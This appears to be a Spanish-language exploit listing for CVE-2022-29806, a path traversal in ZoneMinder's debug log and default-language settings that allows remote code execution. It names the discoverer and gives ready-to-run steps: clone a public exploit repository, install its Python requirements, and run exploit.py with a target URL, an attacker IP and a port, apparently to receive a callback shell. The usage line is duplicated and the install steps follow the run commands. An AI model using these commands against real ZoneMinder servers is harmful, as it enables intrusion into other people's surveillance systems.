
ZoneMinder hasta 1.36.12 Escalada de privilegios de idioma (y RCE) - PoC Exploit
ZoneMinder hasta 1.36.12 Escalada de privilegios de idioma (y RCE)

Una vulnerabilidad de Path Traversal en el archivo de registro de depuración y la opción de idioma predeterminado en ZoneMinder versiones anteriores a 1.36.13 y 1.37.11 permite a los atacantes escribir y ejecutar código arbitrario para lograr la ejecución remota de comandos.
"La prueba de concepto fue probada contra ZoneMinder 1.36.4 en docker ubuntu18.04: ZoneMinder/zmdockerfiles, pero sigue siendo aplicable hasta la versión más reciente 1.36.12"
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
krastanoel descubrió la vulnerabilidad.